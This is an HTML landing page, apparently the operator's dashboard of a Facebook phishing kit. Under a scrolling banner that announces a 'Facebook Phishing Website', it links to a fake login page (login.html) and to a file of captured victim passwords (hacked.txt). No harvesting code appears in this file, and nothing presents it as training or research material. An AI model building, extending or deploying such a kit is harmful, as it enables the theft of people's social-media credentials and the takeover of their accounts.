<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>FB-Phishing</title>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN"
      crossorigin="anonymous"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <style>
      h1 {
        font-size: 1.5em;
        font-family: Arial;
        font-weight: bold;
        margin-bottom: 80px;
      }
      .link-pass {
        border-radius: 5px;
      }
      .fb {
        color: rgb(3, 91, 255);
      }
      .ph {
        color: rgb(245, 16, 0);
      }
      .link {
        display: block;
        text-decoration: none;
        padding: 10px 0;
        text-align: center;
      }
      .link-1 {
        background-color: rgb(3, 91, 255);
        color: white;
        border-radius: 5px;
      }
      .link-2 {
        background-color: rgb(245, 16, 0);
        color: #fff;
        border-radius: 5px;
      }
      .link i {
        margin-right: 20px;
        font-size: 19px;
        color: #fff;
      }
    </style>
  </head>
  <body>
    <main class="container pt-5">
      <marquee>
        <h1 class="text-center">
          Welcome To My <span class="fb">Facebook</span>
          <span class="ph">Phishing</span> Website.
        </h1>
      </marquee>
      <div class="link-pass bg-body-secondary p-3">
        <a href="login.html" class="link link-1">
          <i class="fa fa-facebook-f"></i> FB Phishing Web Link</a
        >
        <hr />
        <a href="hacked.txt" class="link link-2"
          ><i class="fa fa-eye"></i>View Phishing Password</a
        >
      </div>
    </main>
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
      crossorigin="anonymous"
    ></script>
  </body>
</html>
